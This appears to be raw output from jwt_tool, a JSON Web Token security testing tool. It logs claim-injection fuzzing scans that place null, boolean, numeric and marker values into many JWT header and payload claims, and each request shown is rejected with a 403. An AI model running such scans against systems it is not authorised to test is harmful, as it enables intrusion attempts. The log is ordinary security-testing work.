jwttool_1e705dae1df9a4d737cfad41dd30f696 Injected jwt_tool into Header Claim: alg Response Code: 403, 43 bytes
jwttool_a77df295f4ac29d6cdc4d58308345c21 Injected jwt_tool into Header Claim: typ Response Code: 403, 43 bytes
jwttool_08b0963b96186a5cdd7ebd00b14d07e1 Injected 0 into Header Claim: alg Response Code: 403, 43 bytes
jwttool_00568ae8e176a3f43b640de3428d2c08 Injected 0 into Header Claim: typ Response Code: 403, 43 bytes
jwttool_59bb508ddcd0ab68df5f1f8660ca816c Injected None into Payload Claim: exp Response Code: 403, 43 bytes
jwttool_37ca3570ecf6626329c2a521ec839b36 Injected None into Payload Claim: sub Response Code: 403, 43 bytes
jwttool_982335f3fbc555a4aaa23dcceee8a792 Injected None into Payload Claim: scope Response Code: 403, 43 bytes
jwttool_c9fa8fbefc40ee5de3730e55093a4e35 Injected True into Payload Claim: exp Response Code: 403, 43 bytes
jwttool_10b0b8f70f9533c3970fae198ccfdab3 Injected True into Payload Claim: sub Response Code: 403, 43 bytes
jwttool_19ae07744acea1ca5fe566a5f3902f05 Injected True into Payload Claim: scope Response Code: 403, 43 bytes
jwttool_9a6324554f4b01755336dab443f554aa Injected False into Payload Claim: exp Response Code: 403, 43 bytes
jwttool_d86cb65968aa54ac06731db8a53562a0 Injected False into Payload Claim: sub Response Code: 403, 43 bytes
jwttool_1a1c1c01a5237bc345cb329c351ad121 Injected False into Payload Claim: scope Response Code: 403, 43 bytes
jwttool_73e79dcdc0adfd42bffc5bac86efe7a5 Injected jwt_tool into Payload Claim: exp Response Code: 403, 43 bytes
jwttool_b72e3861414807826664f9d81e9a5f9e Injected jwt_tool into Payload Claim: sub Response Code: 403, 43 bytes
jwttool_7f2d3a172e47cf5ff33f3efab5ac98d1 Injected jwt_tool into Payload Claim: scope Response Code: 403, 43 bytes
jwttool_959fc1c017a9ce2f18a1ba6d58be7ee2 Injected 0 into Payload Claim: exp Response Code: 403, 43 bytes
jwttool_bde66c640e056d6288c5ebefb2c5e7b1 Injected 0 into Payload Claim: sub Response Code: 403, 43 bytes
jwttool_81b40e210f5e98b118a96f4a90e4a166 Injected 0 into Payload Claim: scope Response Code: 403, 43 bytes
Scanning mode completed: review the above results.


LAUNCHING SCAN: Common Claim Injection
jwttool_9f5e1767916ed58698445495611c6884 Injected /inject_common_typ into Header Claim: typ Response Code: 403, 43 bytes
jwttool_7b8e3d3642bca70ee65f37ac21b81475 Injected /inject_common_jku into Header Claim: jku Response Code: 403, 43 bytes
jwttool_a44ef85b92cb404919c966c314f134ba Injected /inject_common_kid into Header Claim: kid Response Code: 403, 43 bytes
jwttool_f22f2fe84af673fd292e82b590a5812d Injected /inject_common_x5u into Header Claim: x5u Response Code: 403, 43 bytes
jwttool_7904b1cc884991a5c67bb2989ae2f94a Injected /inject_common_x5t into Header Claim: x5t Response Code: 403, 43 bytes
jwttool_45fd68c48a190de4dcfd90a47c94250c Injected /inject_common_iss into Payload Claim: iss Response Code: 403, 43 bytes
jwttool_50cadf2707ba8add9168f8e1b82ac182 Injected /inject_common_sub into Payload Claim: sub Response Code: 403, 43 bytes
jwttool_3d63dedf585f020c86b1910502889e91 Injected /inject_common_aud into Payload Claim: aud Response Code: 403, 43 bytes
jwttool_7839e6e74da3315057921c847cda99ec Injected /inject_common_exp into Payload Claim: exp Response Code: 403, 43 bytes
jwttool_041398eb1dd032b41a1c29af55357200 Injected /inject_common_nbf into Payload Claim: nbf Response Code: 403, 43 bytes
jwttool_071fcf906386fd67eec1594a09dfdf1c Injected /inject_common_iat into Payload Claim: iat Response Code: 403, 43 bytes
jwttool_f36e4645e970e1d64a731382c20887c1 Injected /inject_common_jti into Payload Claim: jti Response Code: 403, 43 bytes
jwttool_affd2d60767f99cdeb8e857863b77662 Injected /inject_common_name into Payload Claim: name Response Code: 403, 43 bytes
jwttool_b6d4b8befef00c54b95cfc7c752e9a05 Injected /inject_common_given_name into Payload Claim: given_name Response Code: 403, 43 bytes
jwttool_02234cba2a495f1a7f36975ead61ff8f Injected /inject_common_family_name into Payload Claim: family_name Response Code: 403, 43 bytes
jwttool_eb75a4e88b51ce5d0eaedb7f4579af11 Injected /inject_common_middle_name into Payload Claim: middle_name Response Code: 403, 43 bytes
jwttool_f1a669d2961f09ae3abb4f89559a4b10 Injected /inject_common_nickname into Payload Claim: nickname Response Code: 403, 43 bytes
jwttool_5be4c968078e85ea04af8b2c77fe6ae2 Injected /inject_common_preferred_username into Payload Claim: preferred_username Response Code: 403, 43 bytes
jwttool_a8182e2e4900faeeb83adc36f7434621 Injected /inject_common_profile into Payload Claim: profile Response Code: 403, 43 bytes
jwttool_ea21f8678587a63389e8c03f31dd50d7 Injected /inject_common_picture into Payload Claim: picture Response Code: 403, 43 bytes
jwttool_f42c5c6d4ee6c32d053c29e0894dc00d Injected /inject_common_website into Payload Claim: website Response Code: 403, 43 bytes
jwttool_bc1ccf94145df918981ec80d104a1c75 Injected /inject_common_email into Payload Claim: email Response Code: 403, 43 bytes
jwttool_f7964117a97729957818bfba35fd2c0c Injected /inject_common_email_verified into Payload Claim: email_verified Response Code: 403, 43 bytes
jwttool_c50a9a100b4e2d13749acaa7f5c27731 Injected /inject_common_gender into Payload Claim: gender Response Code: 403, 43 bytes
jwttool_8dfdea11cdf58dab5bb7929fd5b36bfd Injected /inject_common_birthdate into Payload Claim: birthdate Response Code: 403, 43 bytes
jwttool_79fcb489b4c850f7ef65103e45912c43 Injected /inject_common_zoneinfo into Payload Claim: zoneinfo Response Code: 403, 43 bytes
jwttool_e9e590e98a458b17c6891168e71592f6 Injected /inject_common_locale into Payload Claim: locale Response Code: 403, 43 bytes
jwttool_0a963ef701015e8815f753a401926950 Injected /inject_common_phone_number into Payload Claim: phone_number Response Code: 403, 43 bytes
jwttool_a4e015eb18bbf89d03947dc876f376d9 Injected /inject_common_phone_number_verified into Payload Claim: phone_number_verified Response Code: 403, 43 bytes
jwttool_d9ee2f6ef215caf63f2e571eaf9971af Injected /inject_common_address into Payload Claim: address Response Code: 403, 43 bytes
jwttool_2b1db24e50559af2a1d4dfe164493152 Injected /inject_common_updated_at into Payload Claim: updated_at Response Code: 403, 43 bytes
jwttool_2bf70dbc8addcbea3b26cd5dedba456d Injected /inject_common_azp into Payload Claim: azp Response Code: 403, 43 bytes
jwttool_2fc87cb376368437b0f637adcfc1ced4 Injected /inject_common_nonce into Payload Claim: nonce Response Code: 403, 43 bytes
jwttool_925f40aa5b916c13cc127c59aab9f54d Injected /inject_common_auth_time into Payload Claim: auth_time Response Code: 403, 43 bytes
jwttool_93b88bb1717b55cbcdbcb799d8c1664e Injected /inject_common_at_hash into Payload Claim: at_hash Response Code: 403, 43 bytes
jwttool_bf7512e946eba8a6f58bd07ae2ceebb9 Injected /inject_common_c_hash into Payload Claim: c_hash Response Code: 403, 43 bytes
jwttool_aec0ddef5ee14256f73b8d43e00845c9 Injected /inject_common_acr into Payload Claim: acr Response Code: 403, 43 bytes
jwttool_0a67ba8544c38c7bf7344a616c2c4eb9 Injected /inject_common_amr into Payload Claim: amr Response Code: 403, 43 bytes
jwttool_6da0728f952cebf8fe0c716edc74d1c5 Injected /inject_common_sub_jwk into Payload Claim: sub_jwk Response Code: 403, 43 bytes
jwttool_d84877c46a76dedd006295ce0f577407 Injected /inject_common_cnf into Payload Claim: cnf Response Code: 403, 43 bytes
jwttool_75c76e007db6f67b9c098cfd098017f9 Injected /inject_common_sip_from_tag into Payload Claim: sip_from_tag Response Code: 403, 43 bytes
jwttool_8bcfea8250e4767fbb8f3769e6c78b78 Injected /inject_common_sip_date into Payload Claim: sip_date Response Code: 403, 43 bytes
jwttool_f20ae5b75ab19afb0c58a672896e133e Injected /inject_common_sip_callid into Payload Claim: sip_callid Response Code: 403, 43 bytes
jwttool_c50020d9a54906ee89812b0b8da93a04 Injected /inject_common_sip_cseq_num into Payload Claim: sip_cseq_num Response Code: 403, 43 bytes
jwttool_2f35f2725a6b47ac5b3301205f588957 Injected /inject_common_sip_via_branch into Payload Claim: sip_via_branch Response Code: 403, 43 bytes
jwttool_33d57a500b556e71fac56f00248f8bed Injected /inject_common_orig into Payload Claim: orig Response Code: 403, 43 bytes
jwttool_097158c813806e28ad976b62ee71b5b7 Injected /inject_common_dest into Payload Claim: dest Response Code: 403, 43 bytes
jwttool_95c3c9decb6bed6545f854ee6ee06fbc Injected /inject_common_mky into Payload Claim: mky Response Code: 403, 43 bytes
jwttool_ce4b1948fcdc2160c848de429315f1d2 Injected /inject_common_events into Payload Claim: events Response Code: 403, 43 bytes
jwttool_579f73ce0b657c6a7e41031e79ea7f48 Injected /inject_common_toe into Payload Claim: toe Response Code: 403, 43 bytes
jwttool_1b28d0f0e679da0b1af9e2f671e3365c Injected /inject_common_txn into Payload Claim: txn Response Code: 403, 43 bytes
jwttool_7a7bafad9dfb96c4603162d980608381 Injected /inject_common_rph into Payload Claim: rph Response Code: 403, 43 bytes
jwttool_5b346a079a46f69c4d081c69134960bd Injected /inject_common_sid into Payload Claim: sid Response Code: 403, 43 bytes
jwttool_64ce868a8ad6af50e68bd0be13fc680f Injected /inject_common_vot into Payload Claim: vot Response Code: 403, 43 bytes
jwttool_e1be071c08dcdd4b81b4c18110dc9096 Injected /inject_common_vtm into Payload Claim: vtm Response Code: 403, 43 bytes
jwttool_c32bfa53d2e74bc07433e52474d7a55b Injected /inject_common_attest into Payload Claim: attest Response Code: 403, 43 bytes
jwttool_bdb7ae6f0602ba0c2d471c0c35727c6f Injected /inject_common_origid into Payload Claim: origid Response Code: 403, 43 bytes
jwttool_cb6a043bebc1fb2b0335fbfc13ecc6ac Injected /inject_common_act into Payload Claim: act Response Code: 403, 43 bytes
jwttool_0396de1e7bd3d278b4a64e24663e358f Injected /inject_common_scope into Payload Claim: scope Response Code: 403, 43 bytes
jwttool_ce744ac67749868f635c6a7b6f4eb1d2 Injected /inject_common_client_id into Payload Claim: client_id Response Code: 403, 43 bytes
jwttool_097884107cf0c31dc1b62d346d2b0c23 Injected /inject_common_may_act into Payload Claim: may_act Response Code: 403, 43 bytes
jwttool_7b6af85f7b6abcee17ed784abb2a1ab1 Injected /inject_common_jcard into Payload Claim: jcard Response Code: 403, 43 bytes
jwttool_aaacc45b30de1cdc5cf6e076428193ee Injected /inject_common_at_use_nbr into Payload Claim: at_use_nbr Response Code: 403, 43 bytes
jwttool_2803ce8e325566436f870aec9818006e Injected /inject_common_div into Payload Claim: div Response Code: 403, 43 bytes
jwttool_cf08d4348355c462f7b40eca52b6b92d Injected /inject_common_opt into Payload Claim: opt Response Code: 403, 43 bytes
jwttool_412435dc5788bcdb52da9c20c48ec053 Injected None into Common Header Claim: typ Response Code: 403, 43 bytes
jwttool_21b41d72400b4ad5fe1d248ad1df1d9e Injected None into Common Header Claim: jku Response Code: 403, 43 bytes
jwttool_70acf5035a969f081a2ec80fc75677cf Injected None into Common Header Claim: kid Response Code: 403, 43 bytes
jwttool_341c53153aac1cf28ffb9bbdc6463e4c Injected None into Common Header Claim: x5u Response Code: 403, 43 bytes
jwttool_3496bc1ab894b1f3167ed917853c0199 Injected None into Common Header Claim: x5t Response Code: 403, 43 bytes
jwttool_5593e95c96949c1121c9ed162efc4366 Injected None into Common Payload Claim: iss Response Code: 403, 43 bytes
jwttool_37ca3570ecf6626329c2a521ec839b36 Injected None into Common Payload Claim: sub Response Code: 403, 43 bytes
jwttool_a092f31dec205cdad03a3b82c9a0cdb6 Injected None into Common Payload Claim: aud Response Code: 403, 43 bytes
jwttool_59bb508ddcd0ab68df5f1f8660ca816c Injected None into Common Payload Claim: exp Response Code: 403, 43 bytes
jwttool_20e32b0e48e815abb89db7b14899ff92 Injected None into Common Payload Claim: nbf Response Code: 403, 43 bytes
jwttool_5e97312b14bfe7b6b6be444d0bf38b10 Injected None into Common Payload Claim: iat Response Code: 403, 43 bytes
jwttool_2fece9d78a2957440328d8a1d58cc9b9 Injected None into Common Payload Claim: jti Response Code: 403, 43 bytes
jwttool_cf32adf56de593cfde5f7bfcc34d9ca3 Injected None into Common Payload Claim: name Response Code: 403, 43 bytes
jwttool_be4f0a00474450a3df3943fbb42a63a4 Injected None into Common Payload Claim: given_name Response Code: 403, 43 bytes
jwttool_576f99f067085fa25b88f6b1f42af12a Injected None into Common Payload Claim: family_name Response Code: 403, 43 bytes
jwttool_ed4b8c9348d698718082bbb3250c89e7 Injected None into Common Payload Claim: middle_name Response Code: 403, 43 bytes
jwttool_0faf72c60314f97ea4c1aa66ee593fdc Injected None into Common Payload Claim: nickname Response Code: 403, 43 bytes
jwttool_d5972f553eac37d01e5c163a9a797fc8 Injected None into Common Payload Claim: preferred_username Response Code: 403, 43 bytes
jwttool_cfa562b1c3337c325d5b8f3826744ab7 Injected None into Common Payload Claim: profile Response Code: 403, 43 bytes
jwttool_2dc7879e7a44074ed4cb892bcf0f5f40 Injected None into Common Payload Claim: picture Response Code: 403, 43 bytes
jwttool_0adeecab2af9a905bbc1a09671e6d0e6 Injected None into Common Payload Claim: website Response Code: 403, 43 bytes
jwttool_885e8f6f220dcc3b6e483b50d78b41af Injected None into Common Payload Claim: email Response Code: 403, 43 bytes
jwttool_9c66cc296c3edd84b5aef1b4037abf6c Injected None into Common Payload Claim: email_verified Response Code: 403, 43 bytes
jwttool_9da260993442e9edd20cb2a81c8c2c78 Injected None into Common Payload Claim: gender Response Code: 403, 43 bytes
jwttool_f83c428dd18f0355b8fd3533862f96b3 Injected None into Common Payload Claim: birthdate Response Code: 403, 43 bytes
jwttool_a703591bee9586a8e086770c57b552b4 Injected None into Common Payload Claim: zoneinfo Response Code: 403, 43 bytes
jwttool_9a0afb4aa8c6b4d2c3ebcfdbb7e5e46e Injected None into Common Payload Claim: locale Response Code: 403, 43 bytes
jwttool_fc4b51c361ba8d7cca45805425749c7c Injected None into Common Payload Claim: phone_number Response Code: 403, 43 bytes
jwttool_91442033f73a10abdc87ac968dd955f9 Injected None into Common Payload Claim: phone_number_verified Response Code: 403, 43 bytes
jwttool_8271b472a65fcac54a7449048126b6c2 Injected None into Common Payload Claim: address Response Code: 403, 43 bytes
jwttool_7a6d445f80aa0fd662a14b5b8e9211f5 Injected None into Common Payload Claim: updated_at Response Code: 403, 43 bytes
jwttool_824f12acc6f207675009f795b847b157 Injected None into Common Payload Claim: azp Response Code: 403, 43 bytes
jwttool_921dfce7580a19350cc07d3c8cb2404d Injected None into Common Payload Claim: nonce Response Code: 403, 43 bytes
jwttool_1a1c5a44b13df88b5470931cc418b354 Injected None into Common Payload Claim: auth_time Response Code: 403, 43 bytes
jwttool_f1d42b3ba92fadc7fffda77f550dc74c Injected None into Common Payload Claim: at_hash Response Code: 403, 43 bytes
jwttool_fbf138b7499045b6abc3cf3fc3531b8f Injected None into Common Payload Claim: c_hash Response Code: 403, 43 bytes
jwttool_3185fc4a8503ed524a0f9e6d2f0fafb3 Injected None into Common Payload Claim: acr Response Code: 403, 43 bytes
jwttool_7a6927d2f2d8d8a3b5c6340cd6ffa90f Injected None into Common Payload Claim: amr Response Code: 403, 43 bytes
jwttool_b5cb8943870e239115fdacf66e2c69fe Injected None into Common Payload Claim: sub_jwk Response Code: 403, 43 bytes
jwttool_149b3213b43bc359eea2e3b0edc54ddb Injected None into Common Payload Claim: cnf Response Code: 403, 43 bytes
jwttool_c2e6980cb6076b2a9cdb4d3bc4068d02 Injected None into Common Payload Claim: sip_from_tag Response Code: 403, 43 bytes
jwttool_66f81f532eaa65c240f2dfc71e419909 Injected None into Common Payload Claim: sip_date Response Code: 403, 43 bytes
jwttool_2eb0dd527d6e7117f955d478d305c21a Injected None into Common Payload Claim: sip_callid Response Code: 403, 43 bytes
jwttool_31fff59a163b928fbbd26791c8000398 Injected None into Common Payload Claim: sip_cseq_num Response Code: 403, 43 bytes
jwttool_4341b08a22caac8298b9b44c2136c28e Injected None into Common Payload Claim: sip_via_branch Response Code: 403, 43 bytes
jwttool_116c973387ee9c6546749ab194bec638 Injected None into Common Payload Claim: orig Response Code: 403, 43 bytes
jwttool_6dd44594f33b1d4641fa5d84aad55996 Injected None into Common Payload Claim: dest Response Code: 403, 43 bytes
jwttool_3bc501b297fc9ca888fc39178989d0a1 Injected None into Common Payload Claim: mky Response Code: 403, 43 bytes
jwttool_8d0f39e9f4adecca3cba2403424b529d Injected None into Common Payload Claim: events Response Code: 403, 43 bytes
jwttool_ec871de81670b751de3ffacfe102f012 Injected None into Common Payload Claim: toe Response Code: 403, 43 bytes
jwttool_6ed0f73f1037f7e0cedf7dcd635615b0 Injected None into Common Payload Claim: txn Response Code: 403, 43 bytes
jwttool_63c6225cf4fa7e1d362d8c01731b5e31 Injected None into Common Payload Claim: rph Response Code: 403, 43 bytes
jwttool_263faef1ae22f61ac5b5453b87bc1259 Injected None into Common Payload Claim: sid Response Code: 403, 43 bytes
jwttool_8e524d33b5590783149c33946b2529e3 Injected None into Common Payload Claim: vot Response Code: 403, 43 bytes
jwttool_0912caed679c9393c781c6849343d612 Injected None into Common Payload Claim: vtm Response Code: 403, 43 bytes
jwttool_e82981e9de255cd1a1c0ff4d8d3bc345 Injected None into Common Payload Claim: attest Response Code: 403, 43 bytes
jwttool_16c8919f31bce975ad258139066e53e5 Injected None into Common Payload Claim: origid Response Code: 403, 43 bytes
jwttool_98401b102e2a40512fd68f4db2cc169a Injected None into Common Payload Claim: act Response Code: 403, 43 bytes
jwttool_982335f3fbc555a4aaa23dcceee8a792 Injected None into Common Payload Claim: scope Response Code: 403, 43 bytes
jwttool_4914942018514f3589d7036e2eda627c Injected None into Common Payload Claim: client_id Response Code: 403, 43 bytes
jwttool_e7b46e3bb45d65076f42ff11f31e5316 Injected None into Common Payload Claim: may_act Response Code: 403, 43 bytes
jwttool_07c0a35a299f0b4adb76cfb33ed6c9aa Injected None into Common Payload Claim: jcard Response Code: 403, 43 bytes
jwttool_272303d1e08494f93a9db57407945d18 Injected None into Common Payload Claim: at_use_nbr Response Code: 403, 43 bytes
jwttool_30f6ee1ebff15f092c7642a200f0722c Injected None into Common Payload Claim: div Response Code: 403, 43 bytes
jwttool_6e1c99b4846c36fe87d52d2e228919d2 Injected None into Common Payload Claim: opt Response Code: 403, 43 bytes
jwttool_56b7bacab86ff37ece3b485c410875eb Injected True into Common Header Claim: typ Response Code: 403, 43 bytes
jwttool_9534b885df82a6e458f05b09ade31526 Injected True into Common Header Claim: jku Response Code: 403, 43 bytes
jwttool_9ee113d18c4ba17a845225778e229503 Injected True into Common Header Claim: kid Response Code: 403, 43 bytes
jwttool_ae75d0133dfe211517d8738af7b21fcc Injected True into Common Header Claim: x5u Response Code: 403, 43 bytes
jwttool_f6672d3a3e6247a95a140edc06bd4a1f Injected True into Common Header Claim: x5t Response Code: 403, 43 bytes
jwttool_be58b9a4f2746e61602d1eb53b0f9703 Injected True into Common Payload Claim: iss Response Code: 403, 43 bytes
jwttool_10b0b8f70f9533c3970fae198ccfdab3 Injected True into Common Payload Claim: sub Response Code: 403, 43 bytes
jwttool_413eb113faf371f23a957fcef862316b Injected True into Common Payload Claim: aud Response Code: 403, 43 bytes
jwttool_c9fa8fbefc40ee5de3730e55093a4e35 Injected True into Common Payload Claim: exp Response Code: 403, 43 bytes
jwttool_e2882fc6b41a06cbeb825be9ef07173b Injected True into Common Payload Claim: nbf Response Code: 403, 43 bytes
jwttool_c37c87d0adeb2b818b257e443de85e11 Injected True into Common Payload Claim: iat Response Code: 403, 43 bytes
jwttool_a5fc62439489d99bd11d9891c2a26ced Injected True into Common Payload Claim: jti Response Code: 403, 43 bytes
jwttool_164b0ad56de213b6417ed95caa149209 Injected True into Common Payload Claim: name Response Code: 403, 43 bytes
jwttool_88334784dfcb600543afc1afa37b4b59 Injected True into Common Payload Claim: given_name Response Code: 403, 43 bytes
jwttool_8fede585930363e55890d8b33bbc8bd1 Injected True into Common Payload Claim: family_name Response Code: 403, 43 bytes
jwttool_bc0505a021aa32eb3a0bd5a605681743 Injected True into Common Payload Claim: middle_name Response Code: 403, 43 bytes
jwttool_5d89a42cc7d7ab1edb527005894e8bad Injected True into Common Payload Claim: nickname Response Code: 403, 43 bytes
jwttool_a4dad63a5511811f6500d404e72c2220 Injected True into Common Payload Claim: preferred_username Response Code: 403, 43 bytes
jwttool_87625c9147113826cd1065e328d6fed8 Injected True into Common Payload Claim: profile Response Code: 403, 43 bytes
jwttool_c74f69438f1dde5ee292e454ad137d0b Injected True into Common Payload Claim: picture Response Code: 403, 43 bytes
jwttool_c1ceb41004fb5f56070e2332c64a49e1 Injected True into Common Payload Claim: website Response Code: 403, 43 bytes
jwttool_ecb72c6a16d23b2fcf7db698a2d9994a Injected True into Common Payload Claim: email Response Code: 403, 43 bytes
jwttool_09ec683ea2b276ef374635acca807a6a Injected True into Common Payload Claim: email_verified Response Code: 403, 43 bytes
jwttool_98d32201ca3f0c8e05f6f016af5499fe Injected True into Common Payload Claim: gender Response Code: 403, 43 bytes
jwttool_f8b12e912e88c2368f953eff7c9f2a1c Injected True into Common Payload Claim: birthdate Response Code: 403, 43 bytes
jwttool_214f34c292c746d2522e42b4fbe182b3 Injected True into Common Payload Claim: zoneinfo Response Code: 403, 43 bytes
jwttool_f1696b23a96714d7511c8fbc845efc16 Injected True into Common Payload Claim: locale Response Code: 403, 43 bytes
jwttool_e8c48516bdb2fec92182c331c5092159 Injected True into Common Payload Claim: phone_number Response Code: 403, 43 bytes
jwttool_11ef44a83828c743133a07de464db387 Injected True into Common Payload Claim: phone_number_verified Response Code: 403, 43 bytes
jwttool_6d1a1531a0258fc6423abb6a8b86c584 Injected True into Common Payload Claim: address Response Code: 403, 43 bytes
jwttool_82715a3d8614ad1810a304379350b16b Injected True into Common Payload Claim: updated_at Response Code: 403, 43 bytes
jwttool_d86a9c6f94f7a81556b53154e8a5c1ef Injected True into Common Payload Claim: azp Response Code: 403, 43 bytes
jwttool_87c4ce61f02579b7333bed31d0255818 Injected True into Common Payload Claim: nonce Response Code: 403, 43 bytes
jwttool_c5e5c25569a9aab713dfeba52e80bf72 Injected True into Common Payload Claim: auth_time Response Code: 403, 43 bytes
jwttool_689631a3443a8acbeccf1990affa9c4a Injected True into Common Payload Claim: at_hash Response Code: 403, 43 bytes
jwttool_5ff813afd8301f7772f5ae5d2b09b3a2 Injected True into Common Payload Claim: c_hash Response Code: 403, 43 bytes
jwttool_2a90fde73b543acfdfdfbf800eaf010c Injected True into Common Payload Claim: acr Response Code: 403, 43 bytes
jwttool_da2b3717cbbdbb1d9faabc33248c5b08 Injected True into Common Payload Claim: amr Response Code: 403, 43 bytes
jwttool_a3c67e5f140500031267b823e3e8d130 Injected True into Common Payload Claim: sub_jwk Response Code: 403, 43 bytes
jwttool_825a4a1a4f5b75832c523752e866f500 Injected True into Common Payload Claim: cnf Response Code: 403, 43 bytes
jwttool_cba4fcda222d4f59a66eae27af1b463a Injected True into Common Payload Claim: sip_from_tag Response Code: 403, 43 bytes
jwttool_345447f5ae3f6001ba1c23a38bb82fdf Injected True into Common Payload Claim: sip_date Response Code: 403, 43 bytes
jwttool_946a116e6817613b982eab850a21c129 Injected True into Common Payload Claim: sip_callid Response Code: 403, 43 bytes
jwttool_283c7829711dc64bf6d4da5956cbc158 Injected True into Common Payload Claim: sip_cseq_num Response Code: 403, 43 bytes
jwttool_76994adbefaa5dd005236092cc7e99e5 Injected True into Common Payload Claim: sip_via_branch Response Code: 403, 43 bytes
jwttool_01527b7f0a8788f62bc75687108809de Injected True into Common Payload Claim: orig Response Code: 403, 43 bytes
jwttool_d89c6f13844143bfcef043855d0147eb Injected True into Common Payload Claim: dest Response Code: 403, 43 bytes
jwttool_5820ce50ee9abac85336e3a56c796c88 Injected True into Common Payload Claim: mky Response Code: 403, 43 bytes
jwttool_06ad902e4072551828f1a8583d16d794 Injected True into Common Payload Claim: events Response Code: 403, 43 bytes
jwttool_a64062250754c73f0138c8958c044206 Injected True into Common Payload Claim: toe Response Code: 403, 43 bytes
jwttool_0d4a835a2f23b62280114068762ffd3a Injected True into Common Payload Claim: txn Response Code: 403, 43 bytes
jwttool_6c4a75536210c781f08eefc1fafb7518 Injected True into Common Payload Claim: rph Response Code: 403, 43 bytes
jwttool_726df51f1e84332718c6cc5f8cd964d3 Injected True into Common Payload Claim: sid Response Code: 403, 43 bytes
jwttool_e7c3b27b041f2e2792f57cbbb10cc849 Injected True into Common Payload Claim: vot Response Code: 403, 43 bytes
jwttool_1f3013f8942c7c3781e36dce38bd5189 Injected True into Common Payload Claim: vtm Response Code: 403, 43 bytes
jwttool_4e50b10de683dd9832f646b95b6d08e9 Injected True into Common Payload Claim: attest Response Code: 403, 43 bytes
jwttool_d7731e7967a9a3a1b22010c82873e7c7 Injected True into Common Payload Claim: origid Response Code: 403, 43 bytes
jwttool_6683166adfed683adeae6cb4aef8d493 Injected True into Common Payload Claim: act Response Code: 403, 43 bytes
jwttool_19ae07744acea1ca5fe566a5f3902f05 Injected True into Common Payload Claim: scope Response Code: 403, 43 bytes
jwttool_ab6890b6dce94e23997b8027f9d99f47 Injected True into Common Payload Claim: client_id Response Code: 403, 43 bytes
jwttool_cae4fbf4ae8219078609ce971c811ccb Injected True into Common Payload Claim: may_act Response Code: 403, 43 bytes
jwttool_6444f975feb910e4ca92058241d6dcae Injected True into Common Payload Claim: jcard Response Code: 403, 43 bytes
jwttool_da8c3b833dce6adbfdd063137e553d83 Injected True into Common Payload Claim: at_use_nbr Response Code: 403, 43 bytes
jwttool_817a4bb072447ee456ff7b263d40dd98 Injected True into Common Payload Claim: div Response Code: 403, 43 bytes
jwttool_93104601c0a7df9611388f65c47ebf3b Injected True into Common Payload Claim: opt Response Code: 403, 43 bytes
jwttool_912e9d8d534ade0ac3313c7c0455992a Injected False into Common Header Claim: typ Response Code: 403, 43 bytes
jwttool_fe460ce2772e98ad7e2ae11bf5fea176 Injected False into Common Header Claim: jku Response Code: 403, 43 bytes
jwttool_46eb462ad12d3ee62240d58479a3071b Injected False into Common Header Claim: kid Response Code: 403, 43 bytes
jwttool_ee340d73010c5cf1db5e3e29034bd673 Injected False into Common Header Claim: x5u Response Code: 403, 43 bytes
jwttool_a44f3f8132e324bb979b9e3f00999246 Injected False into Common Header Claim: x5t Response Code: 403, 43 bytes
jwttool_50adf9af0ec0f944bf9656decc9a0060 Injected False into Common Payload Claim: iss Response Code: 403, 43 bytes
jwttool_d86cb65968aa54ac06731db8a53562a0 Injected False into Common Payload Claim: sub Response Code: 403, 43 bytes
jwttool_a641aef9bc376b5c17a97d5fa1e1630e Injected False into Common Payload Claim: aud Response Code: 403, 43 bytes
jwttool_9a6324554f4b01755336dab443f554aa Injected False into Common Payload Claim: exp Response Code: 403, 43 bytes
jwttool_fdba5e224d5e560a2e138f94bb5f91a4 Injected False into Common Payload Claim: nbf Response Code: 403, 43 bytes
jwttool_5df4d849d12e021bca80d68e59da431a Injected False into Common Payload Claim: iat Response Code: 403, 43 bytes
jwttool_fc537505e92c0e0c3adff78226714504 Injected False into Common Payload Claim: jti Response Code: 403, 43 bytes
jwttool_9d1b2453f0e2d4f2880b2a19601e432b Injected False into Common Payload Claim: name Response Code: 403, 43 bytes
jwttool_788cf6ca04e6f4d7d056cf3f45e26796 Injected False into Common Payload Claim: given_name Response Code: 403, 43 bytes
jwttool_061811e20dabd16cb3beba6bd8739c0a Injected False into Common Payload Claim: family_name Response Code: 403, 43 bytes
jwttool_9024874ed0a97855cb81bd19cdb51fb3 Injected False into Common Payload Claim: middle_name Response Code: 403, 43 bytes
jwttool_64090d15952e1ae3ed1963859f086ce9 Injected False into Common Payload Claim: nickname Response Code: 403, 43 bytes
jwttool_9e8237729bb86ef2de5f8c735a3e9022 Injected False into Common Payload Claim: preferred_username Response Code: 403, 43 bytes
jwttool_9291b491b03b1616a46e5bc4e084e179 Injected False into Common Payload Claim: profile Response Code: 403, 43 bytes
jwttool_fb14a44368846bbc87615b5ea74838fc Injected False into Common Payload Claim: picture Response Code: 403, 43 bytes
jwttool_0bbff142c0c75f162dc55848efc8db24 Injected False into Common Payload Claim: website Response Code: 403, 43 bytes
jwttool_071e37053ddf6b3db1bc9de9e6744c2b Injected False into Common Payload Claim: email Response Code: 403, 43 bytes
jwttool_97b6dc52e781e28aad0734aedfa716f9 Injected False into Common Payload Claim: email_verified Response Code: 403, 43 bytes
jwttool_bb28450f674fa7c9b5527d14ffb0a9c6 Injected False into Common Payload Claim: gender Response Code: 403, 43 bytes
jwttool_f943b1fd5555bf04fbeb372130fbacd1 Injected False into Common Payload Claim: birthdate Response Code: 403, 43 bytes
jwttool_591c85d16cfc2f8e4bcc5100f86e0bb9 Injected False into Common Payload Claim: zoneinfo Response Code: 403, 43 bytes
jwttool_62c4739efed71efa52a595ec5c54d87e Injected False into Common Payload Claim: locale Response Code: 403, 43 bytes
jwttool_c3b19da7b2421e2ca7adf31ee20be1f0 Injected False into Common Payload Claim: phone_number Response Code: 403, 43 bytes
jwttool_45f5e88e71f48d915e9e38038c26c649 Injected False into Common Payload Claim: phone_number_verified Response Code: 403, 43 bytes
jwttool_b54e80891a4cc78c6c2b6448412f98d1 Injected False into Common Payload Claim: address Response Code: 403, 43 bytes
jwttool_763a8da333c52ddd937150f1aca1b8e1 Injected False into Common Payload Claim: updated_at Response Code: 403, 43 bytes
jwttool_b36ed12ff1fa440be3e6878abd65612d Injected False into Common Payload Claim: azp Response Code: 403, 43 bytes
jwttool_0ef3b46fcc7b95f94254a69862ecee64 Injected False into Common Payload Claim: nonce Response Code: 403, 43 bytes
jwttool_705859d8cd152795d1c7b76ccd9515e8 Injected False into Common Payload Claim: auth_time Response Code: 403, 43 bytes
jwttool_b1e1c353b1696b615e6829b4f6d73d40 Injected False into Common Payload Claim: at_hash Response Code: 403, 43 bytes
